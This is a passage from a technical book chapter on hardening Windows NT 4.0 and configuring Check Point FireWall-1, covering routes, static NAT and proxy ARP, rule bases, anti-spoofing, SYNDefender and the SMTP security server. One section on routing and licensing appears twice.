                                            HP-UX 10.20, 11.0 (32-bit mode only)
                                            IBM AIX 4.2.1, 4.3.2, 4.3.3
GUI Client                                  Microsoft Windows 9x, NT, 2000
                                            Sun Solaris SPARC
                                            HP-UX 10.20
                                            IBM AIX

We will use the NT 4.0 version as a model for our discussion. There are a number of reasons for this selection:
• The information required to secure a UNIX system for firewall use has been widely distributed. Techniques for securing NT are less common.
• NT and NT product versions are less mature than their UNIX counterparts, so there are a number of caveats to watch out for during an installation.
• Running a firewall on NT is becoming extremely popular.

For these reasons, our discussion will be limited to the NT version of the product. While there are many interface similarities between the NT and UNIX versions (you can even run the firewall on a UNIX platform and the control software from NT), the installation process does vary greatly between versions.

Prepping NT for Firewall Installation

First let's look at getting NT ready for the firewall product installation. There are a number of tweaks you can perform in order to increase security and optimize performance.

Hardware Requirements

A production NT server that will be used as a firewall should meet or exceed the following criteria (I am assuming that you will have a T1-speed connection or less and that the server will be dedicated to firewall functionality):
• Pentium 200 processor
• 1GB of disk storage
• RAID III or higher redundancy
• 128MB of RAM (minimum for FireWall-1 per Check Point's recommendation)
• 2 PCI network cards

While FireWall-1 will run on a lesser platform, Internet performance and availability have quickly become critical functions. If you are just bringing up an Internet connection for the first time, you will be amazed how quickly your organization relies on it, just like any other business service.

Installing NT

FireWall-1 will run on NT Server or Workstation. Since this system should be dedicated to firewall functionality, the license count difference between these two products should not be an issue. Therefore, you can use either product. It is recommended, however, that NT Server be used, because the permission setting on the Registry makes this platform a bit more secure.

Note  The Windows NT Registry, which stores all the configuration information for the system, varies slightly between NT Server and Workstation. NT Server has a stricter access control policy with regard to Registry keys. This insures that only the system administrator is able to change the values stored within the database keys, thus increasing the integrity of the Registry information.

When installing NT Server, observe the following guidelines:
• Install all required network cards before loading NT.
• Create an NTFS C partition of at least 800MB which will hold the NT operating system and swap file.
• Create an NTFS D partition of the remaining drive space (200MB minimum) to hold the firewall software as well as the firewall logs.
• Load TCP/IP as the only protocol. Make sure IP forwarding is enabled.
• Remove all services unless you plan to have this server join a domain in order to use OS authentication for inbound access. If you do wish to use OS authentication, you will need to run the Computer Browser, NetBIOS Interface, RPC Configuration, Server, and Workstation services.
• Install the SNMP service if you choose to use it (see the "Installing FireWall-1" section for some caveats).
• Configure the system as a stand-alone workgroup, not a domain, whenever possible.
• If the server will be part of a domain, disable all WINS bindings on the external interface.
• Disable the guest account and create a new Administrator-equivalent account for performing firewall management. When you are ready to install the firewall software, log off as Administrator, log on as the new account name, and disable the Administrator account.
• Enable auditing and track logon failures in User Manager. Under User Rights, remove the right for all users to log on from the network. Modify the Logon Locally right to include only the user name you created as an Administrator equivalent.
• Install Service Pack 6a. This is considered the most stable service pack and has the most comprehensive security fixes to date.
• Change the boost to the foreground application to None under the Performance tab in System Properties.
• If you are running the Server service (for domain authentication), go to the Server Properties dialog box and change Optimization to Maximize throughput for network applications.

Tip  NT has a problem where it associates driver names with the NIC loading order in the Registry. If the card settings are changed in any way (IRQ change, cards added or removed, and so on), this Registry setting may become corrupt. You can check this by running the ipconfig command, which will return incorrect card information or an error message that states, "The Registry has become corrupt." This is why it is important to install the NICs before installing NT. The only sure fix is to reload the operating system and all patches from scratch (not as an upgrade).

Once you have followed these guidelines, you are ready to make an Emergency Repair Disk and begin the FireWall-1 product install. Remember that if you load any new software from the NT server CD after this point, you will have to reinstall
• SP6a
• All hotfixes
• The firewall software (as an update)
• The firewall patch

Make sure you have your system exactly the way you want it before you install the firewall software.

Pre-install Flight Check

At this point, you should verify that the firewall platform has IP connectivity. Create a default route that points to the local router interface leading to the Internet. Create required route table entries for any internal network segments that are not directly connected to the firewall.
The correct syntax to use when creating route table entries is

route add -p {remote IP} mask {subnet mask} {gateway address}

So to create a route entry to the network 192.168.2.0, which is on the other side of a local router at IP address 192.168.1.5, you would type

route add -p 192.168.2.0 mask 255.255.255.0 192.168.1.5

Likewise, if the route entry was only for the host 192.168.2.10, you would type

route add -p 192.168.2.10 mask 255.255.255.255 192.168.1.5

Note  The -p switch tells the operating system to make this route entry permanent, allowing the route entry to remain persistent over operating system reboots.

Once you have created your route table, you should test connectivity. This can be done using ping and tracert (NT's version of traceroute). At this point, the firewall platform should have connectivity to all internal and external hosts. If it does not, you need to troubleshoot the problem before going any further.

You should also make sure that you can ping external IP addresses from internal hosts. This will not be possible, however, if you are using private address space for your internal hosts. If you are using private address space, pinging the external interface of the firewall should suffice.

You should also run the ipconfig command and record the adapter driver name associated with the external IP address. This name will be similar to Elnk32. This information will be required later during the firewall software installation if you have purchased a single gateway product. Make sure you record the name exactly, because the entry is case sensitive.

Tip  If you are worried about someone trying to break in to your network while you are testing for connectivity, simply disconnect the WAN connection to your router. You can then test connectivity as far as the IP address on the router's serial interface.

Generating a License

Once you have verified connectivity, you are ready to generate a firewall license. This is done by pointing your Web browser at

http://license.checkpoint.com/

By filling in the online forms, you can register the product and generate a valid license key. The information you will be prompted for includes
• Who you are
• Your e-mail address
• Who sold you the software
• The certificate key number on the inside jacket of the CD case
• The platform and operating system you plan to use
• The external IP address of the firewall

Once you complete the forms, you will be presented with a valid host ID, feature set, and license key. This information will also be sent to the e-mail address that you specified on the form. Once you have this information in hand, you are ready to begin your firewall installation.

Note  The firewall software ships with a 30-day evaluation license that will expire on a specific date (not 30 days after the software is installed). You can use this license to get your firewall up and running if you need it, but the evaluation may not support all the options you require.
The correct syntax to use when creating route table entries is

route add -p {remote IP} mask {subnet mask} {gateway address}

So to create a route entry to the network 192.168.2.0, which is on the other side of a local router at IP address 192.168.1.5, you would type

route add -p 192.168.2.0 mask 255.255.255.0 192.168.1.5

Likewise, if the route entry was only for the host 192.168.2.10, you would type

route add -p 192.168.2.10 mask 255.255.255.255 192.168.1.5

Note
The -p switch tells the operating system to make this route entry permanent, allowing the route entry to remain persistent across operating system reboots.

Once you have created your route table, you should test connectivity. This can be done using ping and tracert (NT's version of traceroute). At this point, the firewall platform should have connectivity to all internal and external hosts. If it does not, you need to troubleshoot the problem before going any further.

You should also make sure that you can ping external IP addresses from internal hosts. This will not be possible, however, if you are using private address space for your internal hosts. If you are using private address space, pinging the external interface of the firewall should suffice.

You should also run the ipconfig command and record the adapter driver name associated with the external IP address. This name will be similar to Elnk32. This information will be required later during the firewall software installation if you have purchased a single gateway product. Make sure you record the name exactly, because the entry is case sensitive.

Tip
If you are worried about someone trying to break in to your network while you are testing for connectivity, simply disconnect the WAN connection to your router. You can then test connectivity as far as the IP address on the router's serial interface.

Generating a License
Once you have verified connectivity, you are ready to generate a firewall license. This is done by pointing your Web browser at

http://license.checkpoint.com/

By filling in the online forms, you can register the product and generate a valid license key. The information you will be prompted for includes
ƒ Who you are
ƒ Your e-mail address
ƒ Who sold you the software
ƒ The certificate key number on the inside jacket of the CD case
ƒ The platform and operating system you plan to use
ƒ The external IP address of the firewall
Once you complete the forms, you will be presented with a valid host ID, feature set, and license key. This information will also be sent to the e-mail address that you specified on the form. Once you have this information in hand, you are ready to begin your firewall installation.

Note
The firewall software ships with a 30-day evaluation license that will expire on a specific date (not 30 days after the software is installed). You can use this license to get your firewall up and running if you need it, but the evaluation may not support all the options you require.

FireWall-1 Security Management
Managing a security policy through FireWall-1 is a multistep process. First you define the objects you wish to control, then you define users, and finally you apply these objects to the rule base. While this configuration may seem a bit complex, it is actually quite straightforward and allows for extremely granular security control.
All security management is performed through the Security Policy-1 tab of the Policy Editor, as shown in Figure 7.6.

Figure 7.6: The FireWall-1 Policy Editor (with the Security Policy-1 tab selected)

Begin by defining your network objects. Select Manage → Network Objects from the Security Policy-1 menu (the available menu options change depending on which policy tab is selected), which will produce the Network Objects management screen shown in Figure 7.7. When you start this screen for the first time, there will be no entries.

Figure 7.7: The Network Objects management screen

There are a number of different object types that can be created. These include:

Workstation  This is a generic object used to create any computer host. This includes hosts with multiple NIC cards, such as the firewall.

Network  This object is used to define an entire IP subnet. This is useful when you wish to apply the same security policy to an entire subnet.

Domain  This object is used to define all hosts within a specific DNS domain name. It is recommended that you do not use this object, because it relies on accurate DNS information and slows down the processing speed of the firewall.

Router  This object is used to define network routers. FireWall-1 has the ability to convert policies created through the Policy Editor to access lists and to update defined routers automatically.

Switch  This object allows you to define network switches.

Integrated Firewall  This object represents an installed FireWall-1 module (also known as an enforcement point).

Group  This object allows you to collect multiple objects under one. For example, you could create a group of all network objects and refer to them as the group local net.

Logical Server  A grouping of two or more modules providing the same service, this object is used to enable load balancing.

Address Range  Instead of an entire IP subnet, this object allows a security policy to be applied to a collection of addresses.

Creating an Object for the Firewall
The first object you should create is one representing the firewall. This is done by selecting New → Workstation from the Network Objects management screen. This will produce the Workstation Properties screen shown in Figure 7.8.

Figure 7.8: The Workstation Properties screen

First, assign a name and an IP address. The system name should be the same as the computer's DNS host name and the Microsoft computer name. Also, it is beneficial to standardize on a single address when referring to the firewall, even though it has multiple interfaces. Typically, the external interface is used. This should be consistent with your local DNS. You may even want to create a hosts file entry on the firewall that includes the system's name and external IP address.

Tip
FireWall-1 will run faster if the NT server has an entry for itself in the local hosts file stored in C:\winnt\system32\drivers\etc.

The firewall and any system that sits behind it are considered to be on the internal network. The only systems considered external are the ones sitting outside the external interface of the firewall. Also, since this system has multiple NIC cards, it is considered a gateway, not a host.
Finally, you should indicate that FireWall-1 is installed on this machine.

If you click the Interfaces tab, you will be presented with a list of system interfaces. Since you have not created any entries yet, the list will be blank. To create an entry, click the Add button. This will produce the Interface Properties screen shown in Figure 7.9.

Figure 7.9: The Interface Properties screen

Here is where you will define your IP spoofing rules. By configuring each of your interfaces, you can insure that the firewall only accepts traffic from a valid IP address. This will help to prevent Smurf and other attacks that rely on using a spoofed address.

The name you use for each interface should match the adapter name used by Windows NT. This will insure that the spoofing rules are applied to the correct interface. You also need to enter the locally attached network address (not the IP address of the NIC but the network subnet address), as well as a valid subnet mask.

Next you will define what traffic source addresses are valid. To do this, select one of the options under Valid Addresses. Here's what each option means:

Any  This option, the default, assumes that life is happy and we trust everyone. No screening takes place for any spoofed IP traffic.

No security policy!  This option is the same as the Any option. No spoof detection is performed.

Others  This option is used in combination with the spoofing filters defined for the other interfaces. In effect, this option states, “All traffic is acceptable except for what has been defined on another interface.” This is the option you would typically select for your external interface.

Others +  This option is the same as Others, except that you have the option to define an additional host, network, or group whose traffic would be considered acceptable, as well.

This net  This option states that only traffic from the locally connected subnet will be accepted. This is useful for defining a DMZ or an internal network segment that has no routed links leading to other subnets.

Specific  This option allows you to specify a particular host, network, or group whose traffic would be considered acceptable. This is useful for defining your internal network when you have multiple subnets.

Once you specify which addresses are valid, you must then tell the firewall what to do when it detects a spoofed address. Your options are

None  Why would I want to know about spoofed packets?

Log  Create a log entry in the firewall log indicating that a spoofed packet was detected.

Alert  Log the event and take some form of pre-configured action.

Note
You can configure alerts from the Security Policy-1 menu by selecting Policy → Properties and clicking the Log and Alert tab.

At a minimum, you should log any attempts to use spoofed packets against your network. The Alert option is useful because it allows you to define some other method of notification that may be able to get your attention more quickly. For example, you could have the firewall send you an e-mail message stating that an alert condition has been encountered.

Repeat this process for each interface that has been installed in your firewall. Once you've done so, you are ready to click OK and save your firewall network object.
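To make the valid-address logic concrete, here is a minimal sketch in Python of the kind of per-interface test the firewall performs on each arriving packet. This is an illustration, not Check Point code: the interface names (modeled on the Elnk32 adapter name mentioned earlier) and the address ranges are hypothetical examples.

# A simplified model of interface-based spoof detection.
# Interface names and networks are hypothetical.
from ipaddress import ip_address, ip_network

# Valid source networks, keyed by the interface a packet arrived on.
VALID_SOURCES = {
    "Elnk31": [ip_network("192.168.1.0/24")],   # internal ("Specific")
    "Elnk33": [ip_network("192.168.2.0/24")],   # DMZ ("This net")
}

def spoofed(interface, source):
    """Return True if the source address is not valid for the
    interface the packet arrived on."""
    if interface not in VALID_SOURCES:
        # External interface ("Others"): acceptable unless the source
        # claims to come from a network defined on another interface.
        internal = [n for nets in VALID_SOURCES.values() for n in nets]
        return any(ip_address(source) in n for n in internal)
    # Internal or DMZ interface: the source must belong to that
    # interface's own list of valid networks.
    return not any(ip_address(source) in n for n in VALID_SOURCES[interface])

# A packet arriving on the external interface (Elnk32) claiming an
# internal source address is flagged as spoofed and should be logged.
print(spoofed("Elnk32", "192.168.1.10"))   # True
print(spoofed("Elnk31", "192.168.1.10"))   # False

The point to notice is that the external interface is defined negatively (the Others option): any source address that belongs to an internal definition is, by elimination, spoofed.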
Working with NAT
Let's create a few more network objects—only this time we will assume that the internal network is using private address space. This means that your firewall will need to perform network address translation between your internal network and the Internet.

As an example, let's set up an internal host that will be acting as a mail relay. Since this host needs to be reachable from the Internet, you will need to use static NAT. Repeat the initial steps you used to configure the firewall object. The only configuration difference is under the General tab of the Workstation Properties screen: leave the FireWall-1 installed check box unchecked. You may also wish to set a different color for this object in order to distinguish it from other objects.

Once you have filled out all the general information, instead of selecting the Interfaces tab, select the Address Translation tab. The screen should appear similar to Figure 7.10.

Figure 7.10: The Address Translation tab of the Workstation Properties screen

Configuring the workstation object to use NAT is pretty straightforward. Once you select the Add Automatic Address Translation Rules check box, the other options become active. For a translation method, you can select

Hide  Hide the system behind a legal address.

Static  Map this private address to a legal address.

Since this system needs to be reachable, define the Translation Method as Static. Next, enter a legal IP address to use in the Valid IP Address field. The Install On option lets you choose which firewalled object enforces the address translation rules. Choosing All installs the rules on all firewalled objects. Finally, click OK and install this entry into your rule base.

Creating Route Entries on the Firewall
You need to perform one more step in order to have this translated address handled correctly. Since NT is actually providing the routing functionality, not FireWall-1, you need to fool NT by creating a static route entry at the command prompt which associates the static NAT address with the host's legal IP address. Do this by typing the command

route add -p {legal IP address} mask 255.255.255.255 {private IP address}

For example, if the IP address assigned to the mail relay is 192.168.1.10, and the legal static NAT address is 206.121.73.10, the entry would appear as follows:

route add -p 206.121.73.10 mask 255.255.255.255 192.168.1.10

This is correct, provided that the host is attached to a segment that is locally connected to the firewall. If the host is located on a remote segment that is on the other side of a router, you should replace the private IP address entry with the router's local address.

Problems with ARP
Using NAT can cause problems when translating between OSI layer 2 (data link) and OSI layer 3 (network) communications. To see how this problem occurs, take a look at the network shown in Figure 7.11. The internal network is using private address space. This means that in order for the mail relay to have full Internet connectivity, static NAT must be used.

Figure 7.11: A network using private address space

Now let's assume that your ISP issues you a single class C address space of 206.121.73.0.
You assign 206.121.73.1 to the Ethernet interface on the router and 206.121.73.2 to the external interface on the firewall, and you wish to use 206.121.73.10 as the static NAT address for the mail relay. This creates an interesting problem. Let's follow the communication session when you try to send an outbound e-mail message to see what happens. For simplicity, let's assume that your mail relay already knows the IP address of the external host to which it needs to deliver a message.

Your mail relay identifies that it needs to deliver a message to an external host. It creates an IP header using its assigned IP address as the source address (192.168.1.10) and the IP address of the remote mail system as the destination IP address (192.52.71.4). The mail relay sets SYN=1 on this initial packet in order to establish a new session. Your mail relay then ARPs for the MAC address of 192.168.1.1 (its default gateway setting) and forwards this first packet to the firewall.

Your firewall reviews the NAT table and realizes that this host address needs to be statically mapped. The firewall then changes the source IP address to 206.121.73.10 and ARPs for its own default gateway, which is the Ethernet interface of the router (206.121.73.1). The firewall then transmits this initial connection request. This process is shown in Figure 7.12.

Figure 7.12: An initial session request from the mail relay

Through the magic of the Internet, this initial packet of data is routed to the destination host. Let's assume that the remote host is in fact a mail system and that your connection request is accepted. The remote host creates an IP header using its IP address as the source address (192.52.71.4) and the legal IP address of your mail system as the destination IP address (206.121.73.10). The mail system sets SYN=1 and ACK=1 to acknowledge your request to establish a new session. Let's assume that this reply makes it all the way back to your router without error.

At this point, an interesting problem arises. Your router receives this acknowledgment on its WAN port and consults its routing table. The router realizes that the 206.121.73.0 network is directly connected to its Ethernet port. Not realizing that this system is on the other side of the firewall, it attempts local delivery by transmitting an ARP request for 206.121.73.10. Since no actual system is using this address, the ARP request fails. The router assumes that the host is down and returns an error to the remote mail system.

How do you get around this ARP problem and get the router to deliver the reply directly to the firewall? Luckily, you have a few options available to remedy this situation.

Fixing ARP at the Router
If the router supports static ARP entries, you could create a phony entry on the router that maps the MAC address of the firewall's external interface to the IP address you are translating. When the router receives a packet for 206.121.73.10, it will no longer need to transmit an ARP broadcast: it will consult its ARP cache, find the static entry you created, and deliver the packet directly to the firewall.
If the router is a Cisco, you could create this entry with the following command in global configuration mode:

arp {ip address} {hardware address} arpa

Tip
To find the external MAC address of the firewall, you can ping the firewall's external address and then view the ARP cache entry on the router. This will display the MAC address entry in the format the router expects you to use when creating the static entry.

Not all routers support the creation of static ARP entries. If you are stuck using one of these routers, you will have to try one of the other options that follow. The only drawback to configuring static ARP entries on the router is that if you have multiple devices on the segment between the firewall and the router (such as other routers or an unprotected server), each device will need a static ARP entry in order to reach this translated address.

Fixing ARP at the Firewall
You can also fix this problem on the firewall by telling the NT server to respond to ARP requests for the translated address when it sees them. This is referred to as proxy ARP and is a common feature on UNIX platforms. Unfortunately, NT has no built-in method for performing proxy ARP for other IP addresses. Fortunately, we can configure proxy ARP through the FireWall-1 software.

Note
Most UNIX machines support static ARP entries with a -p switch. This switch tells the UNIX machine to "publish," or act as a proxy for, the specified IP address. If your firewall is running on UNIX, this will fix the ARP problem with NAT addresses.

To fix our ARP problem, you will need to create a file in the \%fw1%\state directory. Name the file local.arp. In this file, create one entry per line that associates each statically mapped IP address with the MAC address of the firewall's external interface. The format of each line should be

206.121.73.10 00-00-0C-34-A5-27

Once you have rebooted the system, the firewall will begin responding to ARP requests for the listed entries.

Note
The only drawback to this method is that it does not work consistently if you create 10 or more entries. How often the system replies will depend on how busy it is at the time. If you have many IP addresses that will need to be translated, you should look at fixing proxy ARP for NT through one of the other listed methods.

Fixing ARP through Routing Changes
Of course, the easiest way to fix ARP for NAT addresses is to make sure that ARP is never an issue. You can do this by changing your subnet address scheme and your routing tables so that the router no longer thinks that the static NAT address is local.

For example, let's say that you went back to your ISP and asked it to issue you a new legal subnet address, in addition to the one already supplied. Instead of asking for a full class C address space, you ask for one that uses a 255.255.255.252 subnet mask. Most ISPs will be receptive to this request, because such a subnet only supports two hosts and ISPs usually have address space broken down into this increment for use on point-to-point WAN links.

Tip
If your ISP will not issue you additional address space, you can subnet the address space you have already received.

Once you have obtained this address space, use it to address the network between the router and the firewall.
For example, if your ISP issued you the network address 206.121.50.64, you could use 206.121.50.65 for the Ethernet interface on the router and 206.121.50.66 for the external interface on the firewall. You would then need to create a route entry on the router, telling it that the best route to the 206.121.73.0 network is through the firewall's external interface (206.121.50.66).

Tip
Remember that if you change the external IP address on the firewall, you will need to generate a new license key.

Now your router no longer thinks it is local to your statically mapped addresses and will no longer send an ARP request for these addresses when attempting delivery. Instead, the router will defer to its routing table and realize that this is not a local host, so it must transmit the packet to the next hop, which is the firewall.

Working with the FireWall-1 Rules
Now that you have created your required network objects, it is time to employ them in your firewall rules and implement your security policy. A sample policy is shown in Figure 7.13.

Figure 7.13: Sample FireWall-1 rules

The rules read from left to right. For example, Rule 4 states, “Any IP host connecting to the system web_server on port 80 should be allowed through the firewall.” Port 80 is the well-known port for HTTP. Remember that FireWall-1 is simply going to screen the packet headers. It has no way to know for sure if the remote system is actually transmitting HTTP requests. The Service column employs service names, instead of port numbers, for improved ease of use. Here's a description of each column:

No.  Identifies each rule by number in order to provide a reference.

Source  Identifies the source hosts or networks affected by this rule.

Destination  Identifies the destination hosts or networks affected by this rule.

Service  Identifies the service port numbers affected by this rule.

Action  Determines what should be done with a packet if the source, destination, and service are a match. Options are
ƒ Accept  Lets it through.
ƒ Drop  Discards the packet with no notification to the source.
ƒ Reject  Sends an RST=1 packet to the source.
ƒ User Auth  Invokes User Authentication for the connection.
ƒ Client Auth  Invokes Client Authentication for the connection.
ƒ Session Auth  Invokes Session Authentication for the connection.
ƒ Encrypt  Encrypts outgoing packets; accepts and decrypts incoming packets.
ƒ Client Encrypt  Accepts only SecuRemote (Check Point's VPN client) communications.

Track  Determines what should be done when this rule finds a match. Options are
ƒ Ignore  Not represented by an icon; leaving Track blank does not create a log entry.
ƒ Short log entry  Records the source IP address and the destination IP and port address.
ƒ Long log entry  Records the short entries plus source port and packet size.
ƒ Account  Writes an entry to an accounting log.
ƒ Alert  Takes a special predefined action.
ƒ Mail  Sends an e-mail which includes the log entry.
ƒ SNMP Trap  Issues an SNMP trap (defined in the SNMP Trap Alert field on the Log and Alert tab of the Properties Setup window).
ƒ User defined  Performs a user-customizable action.

Install On  Defines on which systems the rule entry should be enforced. The default is Gateways, which includes all Network Objects defined as Gateways.
You can also selectively install each rule on:
ƒ Dst  Represents inbound traffic on Network Objects defined as the Destination (usually servers).
ƒ Src  Similar to Dst, but represents outbound traffic (that is, client-initiated).
ƒ Routers  Rules are enforced on all routers.
ƒ Integrated FireWalls  Rules are enforced on all integrated firewalls.
ƒ Targets  Rules are applied to a specific target, on both inbound and outbound traffic (called eitherbound by Check Point).

Time  Determines what time of day, day of the week, or day of the month this rule should be enforced. For example, if Time on rule 3 were changed to read 5:00 PM to 8:00 AM, users could only access the Internet during non-business hours. A new Group object can also be created to hold multiple Time objects, which are applied collectively (as the Group) to a particular rule.

Comments  Allows you to add text describing the purpose of the rule. (This column is only partially shown in Figure 7.13.)

Understanding the Rule Set
Let's look briefly at each of the rules shown in Figure 7.13. Feel free to adapt these rules to your environment as you see fit.

Rule 1 tells the firewall to drop, but not log, all NetBIOS traffic originating from the internal network. Windows machines broadcast name information once per minute. These entries can quickly fill up your log and make it difficult to weed out the information you are actually interested in. When you leave the Track column blank, the log does not record this traffic.

Rule 2 is used to block any services that you absolutely do not want to let past your firewall. This can be used to minimize the effects of a break-in. For example, let's say that your Web server is attacked and compromised. The attacker may try to transmit SNMP information to a remote location in order to gain additional information on the internal environment. Since most organizations typically have a fairly loose policy regarding Internet access, this information would otherwise be allowed to leave the network. Rule 2 not only blocks this traffic, it also notifies the administrator that something fishy is going on.

Rule 3 lets your internal systems perform any type of communication they desire, except for services blocked by earlier rules. Like a router access list, FireWall-1 processes rules in order, so traffic is evaluated on a first-fit basis, not a best-fit basis.

Rules 4 and 5 allow acceptable traffic in to your Web server and mail relay, respectively. Because these systems are located on an isolated DMZ, Rule 6 is required to let your mail relay deliver SMTP messages to your internal mail system. When this rule is combined with Rule 7, no other traffic is permitted from the DMZ to the internal network. Again, this helps to protect your internal systems if one of your public servers becomes compromised. Rule 8 is then used to allow your mail relay to deliver messages to hosts out on the Internet.

Rule 9 looks for suspicious activity: specifically, for traffic trying to connect to the TCP echo and/or Character Generator services. These services have many known exploits, and none of your internal systems actually offers them. Rule 9 is set up specifically to see if someone is probing your network, perhaps with a scanner. If such traffic is detected, you want the firewall to take additional action beyond simply creating a log entry.
So why not monitor all unused ports? If the attacker is using a port scanner, this rule may be evaluated hundreds—even thousands—of times. The last thing you want is to cause a denial of service on your mail system as the firewall tries to warn you of an attack in progress (kind of defeats the whole purpose, doesn't it?).

Rule 10 is your implicit denial. This rule states, “Deny all traffic that does not fit neatly into one of the above-mentioned rules.”

Modifying the Rules
To add a row and create a new rule entry, select the Edit menu option. Each new row will be created with the default rule: “Deny all traffic.” To change the parameters, simply right-click in each box and select Add.

To change the Source entry for a rule, for example, you would simply right-click in the Source box and select Add from the drop-down menu. You would then see a list of valid objects you could add to specify the source parameter for this new rule. Continue this process until you have created all the rules required to implement your security policy.

Modifying the Firewall Properties
The rule base is not the only place where you need to configure traffic parameters. You also need to modify the properties of the firewall itself. To do this, select Policy → Properties from the Security Policy-1 menu. The Properties Setup screen is shown in Figure 7.14.

Figure 7.14: The Properties Setup screen

Note
This screen is a bit disturbing, as it defines traffic that should be processed outside of the rule base. In other words, this screen defines services that should be processed even if they have not been specifically defined within the Rule Base Editor.

Notice that the Accept RIP option is selected by default. This option tells the firewall, “Accept RIP traffic before you even process the rule base.” Even if you do not have a rule telling the firewall to accept RIP updates, the firewall will do so anyway. If Woolly Attacker knows you are using FireWall-1, he may attempt to transmit false RIP updates to your firewall in an effort to corrupt your routing table. This is another one of the reasons that static routing should be used whenever possible.

There are also services that you can enable or disable on the other Properties Setup tabs. Make sure you check the Services and Access Lists tabs to insure that they match your access control policy.

When Properties Are Processed
These properties are a major security hole if you do not configure them to match your security policy. You can specify when to process each of these properties by using these settings:
ƒ First  Accept this traffic before processing the rule base.
ƒ Before Last  Accept this traffic unless the rule base specifically blocks it from taking place.
ƒ Last  Process this traffic after the last rule in the rule base. If it is not specifically blocked, let it pass. If the last rule is “Drop all traffic from any source to any destination,” this property is not evaluated.

So why this major lapse in security? As with many things in life, security was compromised in an effort to make the firewall easier to use, appealing to the lowest common denominator. For example, the firewall administrator may not be able to figure out that she needs to accept RIP traffic in order to process route updates.
The administrator may be a little slow on the uptake and not realize that she needs to pass DNS queries in order to allow internal systems to resolve host names to IP addresses. These properties are enabled by default in order to cover for this kind of mistake. Rather than improving consumer education, companies compensate by decreasing the level of security their products offer.

The SYNDefender Tab
The final Properties Setup tab you should evaluate is the SYNDefender tab. SYNDefender allows the firewall to protect internal systems from SYN-based attacks.

You may remember from our discussion of TCP-based communications in Chapter 3 that two hosts will exchange a TCP handshake before initializing the session. During this handshake
1. Source sends a packet to the destination with SYN=1.
2. Destination replies to source with SYN=1, ACK=1.
3. Source sends a packet to the destination with ACK=1.
4. Source starts transmitting data.

Note
A TCP host uses two separate communication queues: a small one for sessions that still have the TCP handshake taking place, and a larger one for sessions that have been fully established. It is the smaller queue that is the target of a SYN attack.

When the destination host receives the first SYN=1 packet, it stores this connection request in a small “in process” queue. Since sessions tend to be established rather quickly, this queue is small and only able to store a relatively low number of connection requests. This was done for memory optimization, in the belief that the session would be moved to the larger queue rather quickly, thus making room for more connection requests.

A SYN attack floods this smaller queue with connection requests. When the destination system issues a reply, the attacking system does not respond. This leaves the connection request in the smaller queue until the timer expires and the entry is purged. By filling up this queue with bogus connection requests, the attacking system can prevent the system from accepting legitimate connection requests. Thus a SYN attack is considered a denial of service.

The SYNDefender tab offers two ways to combat this problem. You can configure the firewall to act as
ƒ A passive SYN gateway
ƒ A SYN gateway

As a passive SYN gateway, the firewall queues inbound connection requests and spoofs the reply SYN=1, ACK=1 packet back to the transmitting host. This prevents the connection request from ever reaching the internal system. If a proper ACK=1 is received from the transmitting system, the firewall then handshakes with the internal system and begins passing traffic between the two hosts. In effect, the firewall is acting like a SYN proxy.

The only drawback to this method is that it adds a slight delay to the initial session establishment. It also adds a lot more processing on the firewall as it attempts to mediate all of these connection requests. For example, a Web browser will create multiple sessions when it downloads a Web page: a separate session is established for each graphic, piece of text, or icon. Most popular Web sites will create a minimum of 50 sessions, and some graphically rich sites will top 300 simultaneous connections. As an added protection, the passive SYN gateway allows you to specify a timeout (the default is 10 seconds) and the Maximum Sessions allowed (the default is 5000).
The other option is to set up the firewall as a SYN gateway. In this mode, the firewall lets the SYN=1 request and the SYN=1, ACK=1 reply simply pass through the firewall. At this point, however, the firewall will spoof an ACK=1 back to the internal system in order to complete the connection request and move the session to the larger queue. When the remote system responds with an ACK=1 of its own, the firewall blocks this one packet but allows the rest of the session to take place normally.

If the remote host does not reply within a configurable amount of time, the firewall will send an RST=1 to the internal system, thus terminating the session. The only problem here is that you may end up creating sessions on the internal system that are not required if an attack is taking place. This is typically not a problem, because the active session queue is in a far better position to handle multiple sessions than the connection queue would be. This method also helps to remove the establishment delay caused by the passive SYN gateway method.

Working with Security Servers
Security servers allow the firewall to proxy connections for a specific service, allowing for better traffic control. This is useful when you want to make filtering decisions based on the content of the data (the payload) rather than on the service being used.

For example, let's assume that you have three different domain names registered with the InterNIC: foobar.com, fubar.com, and bofh.com. Foobar.com is the primary domain name, but you want to receive mail for all three domains. This applies to every user: mail for ftuttle@foobar.com, ftuttle@fubar.com, and ftuttle@bofh.com should all be routed to the same person. Outbound mail, however, should always appear to originate from the foobar.com domain.

If you try to configure your mail server to handle multiple domains, you might be in for a lot of work. Many mail systems would require you to configure three different mail addresses for each user. Typically, the first one would be automatically created (such as ftuttle@foobar.com), and you would have to manually create an e-mail alias for the other two entries (ftuttle@fubar.com and ftuttle@bofh.com). These additional aliases would increase administration time and introduce the possibility of errors through typing mistakes or missing entries.

If you were really unlucky, your mail system might not even have the ability to host multiple mail domains. This is especially true of older mail servers, which allow the mail administrator to configure only a single mail domain. Mail addressed to the additional domains would simply be rejected.

A simpler solution is to configure the SMTP security server to screen inbound mail for the destination domain name. If the domain name fubar.com or bofh.com is detected, the security server replaces it with the domain name foobar.com. Mail that is addressed to foobar.com is allowed through without alteration. This means that all inbound mail messages reaching your mail server will have a destination domain address of foobar.com. Since your mail server only sees a single domain name, you won't have to create alias e-mail addresses for each user.
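Before walking through the configuration screens, it may help to see the rewrite logic in miniature. The following Python sketch is purely an illustration (it is not anything the product exposes); it mimics the match-and-rewrite behavior just described, using the same three domains:

# A simplified model of the inbound recipient rewrite.
import re

# (match pattern, rewrite template): anything sent to fubar.com or
# bofh.com is rewritten to the same user at foobar.com.
REWRITES = [
    (re.compile(r"^(.+)@fubar\.com$"), r"\1@foobar.com"),
    (re.compile(r"^(.+)@bofh\.com$"),  r"\1@foobar.com"),
]

def rewrite_recipient(recipient):
    """Rewrite an inbound recipient address to the primary domain.
    Mail already addressed to foobar.com passes through untouched."""
    for pattern, template in REWRITES:
        if pattern.match(recipient):
            return pattern.sub(template, recipient)
    return recipient

print(rewrite_recipient("ftuttle@fubar.com"))   # ftuttle@foobar.com
print(rewrite_recipient("ftuttle@foobar.com"))  # ftuttle@foobar.com

The back-reference (\1) plays the same role as the ampersand (&) you will meet on the Action1 tab: it copies whatever the wildcard matched, so the user name survives the rewrite.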
Configuring the SMTP Security Server
In order to use the SMTP security server, you first need to enable it through the FireWall-1 Configuration utility. We discussed how to enable this server in the section on the FireWall-1 Configuration utility and even showed this feature enabled in Figure 7.5. Once the SMTP security server is enabled, you will need to define SMTP resources through the Security Policy-1 tab.

